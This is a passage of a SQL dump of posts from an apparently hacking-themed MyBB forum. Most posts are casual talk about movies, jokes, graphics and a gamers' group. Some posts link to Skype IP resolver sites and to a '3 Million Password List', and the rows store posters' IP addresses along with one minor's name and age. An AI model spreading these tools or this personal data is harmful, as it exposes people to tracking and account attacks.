[b][align=center][size=large][color=#FFD700]Header[/color][/size][/align][/b] [align=center][img]http://i.imgur.com/nti1s.png[/img][/align]', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '7a4af2d75baad2a1454b2667101b2815', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2929', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '3', '??????????¢™', '1348975487', 'Hopefully he looks at this thread. Thanks anyways.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '2e129444ae82fa8af59ea82922ee5d25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2930', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '1', 't3h jok3r', '1348975702', 'The BGs are not transparent but I think we can change the BG color.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '43c072fc7244a7541b5dcda5d70b2889', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2931', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '1', 't3h jok3r', '1348975840', 'I think you forgot. LH is not a post here PM me site. It\'s either you post the download or tell them to post and the OP PMs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dfa16434cd09be3c392cc569a65476a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2936', '605', '2934', '64', 'RE: Dredd 3D (2012) Movie RIP', '0', '1', 't3h jok3r', '1348977303', 'Nice share. Thanks I\'m going to watch it online later on tonight. Well tomorrow because there\'s like 5 mins left to 12.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a8b380fd03f06d085ed3805a2fbe138', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2937', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '1', 't3h jok3r', '1348979665', 'No problem. Thanks for contributing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ce652d4fa874bbc604f4b64405520c22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2938', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1348979854', 'No problem man, I am proud to be a staff member.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '31ad6dfc0ed7b623ecbd49d07e2b75d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2939', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '10', 'swa4567', '1348980338', 'No problem. Thanks for trying my tutorial.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f49f26e4b68fc2d381b87ae54c5d5ca8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2940', '564', '2906', '7', 'RE: What Do You Do To Relax?', '0', '10', 'swa4567', '1348980431', '[quote=\'iTzIpod\' pid=\'2906\' dateline=\'1348970582\'] I love Prison Break. So does t3h jok3r :p Too bad the series ended :/ [/quote] Wow lol i like it too. I\'m where scofield fails to escape sona.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '92063423bf1b8e52477a792d77ff1d16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2941', '587', '2854', '65', 'RE: Who likes the Rocky Films?', '0', '3', '??????????¢™', '1348980688', 'Moved to the right section, Belonged in the Movie section.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'bc7ae4d6f1af86dbc983c347327d95ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2942', '607', '0', '7', 'Wanna laugh?', '0', '10', 'swa4567', '1348980994', '[b]Joke # 1[/b] Yo momma so old her birth certificate says expired! [b]Joke # 2[/b] The way yo glasses so big, when you look at the map you see people waving [b]Joke # 3[/b] Last time I checked your blood type is Ragu. [b]Joke # 4[/b] The way you sooo ugly you make the devil read the bible. [b]Joke # 5[/b] The way you so slow you remind me of you mom on new years night.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'cb2bf73e594e8b7ea219c65794f5e641', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2943', '608', '0', '66', 'Welcome To Gamers!', '0', '61', 'NXK', '1348983270', 'This will be our introductory thread, Please fill out all your details GamerTag - xINEXXONIx PSN - // Steam - jm19nyc Skype - // Like so!', '99.253.94.204', '1677549260', '1', '0', '61', '1349816777', '1', '3e485ff9f4a91cef999946ce79021acb', '0', '1349816777'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2944', '609', '0', '58', 'Gamers Recruitment', '0', '61', 'NXK', '1348983476', 'Want to join the gamers group? How to join? Must have 10+ posts Be HQ No scam reports Positive rep (Any negetives will be reviewed) Id like to see people come up with there own Applications I wont set a limit for what you have to say. I want to see people that will take the initiative to write A HQ Application. (Thread will be remade tomorrow)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '21a4d496bc2319dce96f7e0de0642506', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2946', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '199', 'Anonymous™', '1348993811', 'I just watched the movie Ted.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '565d5de1a63ec502adf8ab48969f8439', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2947', '490', '2381', '49', 'RE: Forum Suggestion', '0', '199', 'Anonymous™', '1348994086', 'I also think it should be added, I like to play minecraft and League of Legends.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'fef96446b4481cd7b0fdeb5b5c42068d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2948', '488', '2507', '8', 'RE: What are you listening to?', '0', '199', 'Anonymous™', '1348994196', '[quote=\'iTzIpod\' pid=\'2507\' dateline=\'1348456939\'] That song is alright. :p I personally don\'t like it. But different people = different opinion. I\'m listening to Owl City - Good Time [/quote] I do not know why but I really like this song.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'fe54858073413f2be21f76b181205b17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2949', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '53', 'sirchamp', '1348994485', 'Can I have the source code? Thanks', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '71401a9d3ba45040bcb60bf848de9d19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2950', '587', '2903', '65', 'RE: Who likes the Rocky Films?', '0', '205', 'mothered', '1349005338', '[quote=\'Romdu62\' pid=\'2903\' dateline=\'1348970512\'] Never heard of rocky films before. [/quote] So you\'ve never heard of \"Rocky Balboa?\" That has to be a first. Nonetheless, check It out and see what you think.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1858261db67e42beebc6a50f6447104c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2951', '602', '2915', '63', 'RE: [Request] Sig and Avatar', '0', '62', 'R?????zo?', '1349005349', 'I will do this once I\'m free. should be done later today. [hr] [img]http://i.imgur.com/4i7oz.gif[/img] not sure what to make as avatar', '94.132.244.168', '1585771688', '1', '0', '62', '1349011945', '1', 'c3779c25c996cb0e16d7b5897b750f19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2952', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '205', 'mothered', '1349005910', 'I wouldn\'t mind checking this out mate. Thanking you In advance.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b12ee54cb49ac6d956fcca25b81286e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2953', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '205', 'mothered', '1349006044', 'I don\'t know you, but wish to welcome you back to LH :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a0c47dbb82567214c7e1a482ee113cb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2954', '560', '2788', '24', 'RE: Windows 7 Official direct downloads', '0', '205', 'mothered', '1349006238', 'You\'re welcome mate. The page Is fine on my end. Try cleaning your browser\'s cache, or navigate via a different browser altogether.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '899da5f92c73034df2c7185c007a85e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2955', '514', '2616', '9', 'RE: How to make serious money', '0', '100', '??zg???g????61', '1349010631', '[quote=\'p420\' pid=\'2616\' dateline=\'1348679861\'] Nice method but when I click on buy now on the website, it opens the outlook mail program on my PC. [/quote] I found this under their FAQ section, it might help you. Click on \"Buy Now\" in front of the item you\'re interested in purchasing. You\'ll need an email client like \"Thunderbird\" or \"Microsoft Outlook\" for it to work. Your default mail client will popup with pre-filled text, edit as per your requirements. Click Send. If you don\'t have an email client or don\'t want to use one, copy the template found in the following \"PASTIE\" and mail us at codestore.eu@gmail.com You\'ll be replied within 12-16 hours. Pay as explained in the email, please don\'t write any notes while paying with PayPal or any other payment method. Your order will be delivered within 24 hours of payment. We expect you to wait atleast 24 hours if we\'ve not replied within the timeframe. You can request another download link if the link expires within a period of 7 days. Your satisfaction is our first priority and we do our best to resolve any issues. Please let us know if you\'ve any queries/problem at: codestore.eu@gmail.com', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', 'af33349b40626d7999a60f2d9355c9ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2956', '595', '2902', '65', 'RE: What movie did you watch recently?', '0', '53', 'sirchamp', '1349012241', '[quote=\'Romdu62\' pid=\'2902\' dateline=\'1348970474\'] I watched Ted. Im not a kid its just that its a funny movie [/quote] I also watched ted. Funny film. Its not a film for kids. It\'s 16+', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6062fbabab2a6dd2f8855b27b91e0057', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2957', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '203', 'NeonLights', '1349012679', 'i just got the 200th member :D what do i get? :3', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '381a7d2197c9108f891f14b516f00bd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2958', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '100', '??zg???g????61', '1349014885', 'I just watched expendables 2 ;D', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', 'fec379acc2ab31c4a886c44d7531c9eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2959', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '100', '??zg???g????61', '1349015054', 'Welcome back sir ;D you sound HQ', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', '17979b32743db90f34a15cda82475429', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2960', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '2', 'Apathy', '1349016478', 'Welcome back reborn. :)', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '354113a62c73dbaaf1c86daceb9e4cfb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2961', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '2', 'Apathy', '1349016585', 'I watched the switch up. With Seth rogen.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', 'b7137515d8b87f94c75b8900d1873a04', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2962', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '82', 'iTzIpod', '1349016979', 'Never really saw this thread... I like the beats though! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '96f8a62696ac409abf7d34449b2f3e7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2963', '607', '2942', '7', 'RE: Wanna laugh?', '0', '82', 'iTzIpod', '1349017192', 'I heard some of those jokes already :p Pretty common. :p But the Ragu one was pretty funny.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a228a99c748441bfb8b7c4598de5ea31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2964', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '82', 'iTzIpod', '1349017505', 'Username: iTzIpod Name: Ryan/Jacob Age: 13 Profile: http://l33thacking.net/user-82.html Why I should join Gamers: I should join Gamers because I play a lot of games. I have my own weaknesses and strengths. Ex: CoD. I can play good on Default Controller settings. But when I play on Tactical, I get messed up. I can\'t play on a low sensitivity. But I can play on the highest possible. I play a lot of games. I play from PC to Game Consoles (PS3) to Handheld Consoles (Nintendo DS) etc. What I can contribute in the group: Pretty much anything needed. If someone needs advice, I can try to give you some. PSN ID: SoaR_iPod I don\'t know :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e491d0314fb0da617d84c2660324e842', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2965', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349017647', 'http://www.1channel.ch/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '307ab62ff8d164b1445c14716c28b29e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2966', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '82', 'iTzIpod', '1349017858', 'You get nothing :p I just want to congratulate L33tHacking on 200+ Members (Official) I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ffd0f653fccf995fbd4517c381bc7e42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2967', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1349017928', 'Rewatched 21 Jump St. Lmfao can\'t stop watching this :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '963e1803a209de0791559c4a992d3d35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2968', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '203', 'NeonLights', '1349018007', 'ur fucking kidding me? i worked my ass of to get that dam user to use my refer link and now ur telling me this was a joke?', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'cef939726438ccaabc370fc260f9c72b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2969', '599', '2909', '7', 'RE: Someone refer the 200th Member', '0', '82', 'iTzIpod', '1349020020', 'Sorry. Totally forgot that I promised to give the winner a spot in Unique. You\'re now in Unique. Closed', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '887dec0a793f132c9d078180e5489c3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2970', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '203', 'NeonLights', '1349020559', 'wow this is actually pretty good :0 good job on this :P', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a97d48aa19277b06d56348d7d82acd28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2971', '610', '0', '61', 'Free Skype Resolver - Fast Resolve!', '0', '82', 'iTzIpod', '1349020752', 'Hey LH, This Resolver is not mine. The link for the resolver is: http://www.resolver.ciki.me/lf/resolver.php . Happy Resolving!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '70d06ffeda16b1a797824afc39023d81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2972', '611', '0', '61', 'Another Webbased Skype IP Resolver!', '0', '82', 'iTzIpod', '1349020945', '[align=center][img]http://steamgift.info/FreeSkypeResolver.png[/img][/align] [b] Heres the link[/b] http://steamgift.info/resolve.php [b]Please leave a comment.[/b]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e034436e2c2b09a32121b4c93b16ab14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2973', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '82', 'iTzIpod', '1349024105', 'My opinion, I don\'t like them. But like I said. It\'s my opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '169decd190b6da76097662a94005df10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2974', '482', '2343', '61', 'RE: 3 Million Password List', '0', '82', 'iTzIpod', '1349024230', 'Updated link. Sorry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9373c6d92d70b3a75a1fef8db1a7099d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2975', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '82', 'iTzIpod', '1349024419', 'GamerTag - N/A PSN - SoaR_iPod or iTzExtremeiPod Steam - N/A Skype - iTzIpod :D Hey everyone. I\'m guessing I\'m the 2nd Member in Gamers. I hope... :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '824ea56ac2ca37f0cdf33f3f17b457da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2976', '612', '0', '66', 'Rate this edit?', '0', '82', 'iTzIpod', '1349024570', '[video=youtube]http://www.youtube.com/watch?v=mxjz1fMSpqQ[/video] Not me :( Wish it was xD Also, PrestigeMontageHD has inactive subs. I don\'t recommend them sponsor you. Their clips aren\'t that good. But some of them are. Most of them aren\'t.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7a2e935028496940fe78e9b01ef2e5de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2977', '613', '0', '66', 'Some Changes that will be made', '0', '61', 'NXK', '1349024681', 'I\'ve decided to change the userbar to something else. I don\'t think the colors of the userbar now Really match the color scheme of this website So Ill be switching it to something more basic. This is going to be the new userbar. [img]http://i.imgur.com/CWKlk.png[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '83bd5f39734947ee66c252c8b1876647', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2978', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349024699', 'Thank you, for welcoming me back. Its nice to be back.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '13e048fad59b1717b391b653fdde2f9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2979', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1349024825', 'I have sent the source to everyone above. Enjoy :)', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'cb659e7b4cacca383cf351df533ba0e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2980', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1349024849', 'Do you want me to change it saying : \"Gamers\" instead of Gamer? That\'s mine right? O_o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f2ac68611dd936416ed024370b085c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2981', '604', '2928', '61', 'RE: Unique Sig and Header', '0', '3', '??????????¢™', '1349024875', 'Its okay, I was just giving them to you guys if you wanted to use them but if you dont like them you dont have to use them.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'e0e6a673c93716d27a6711d06f1289bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, 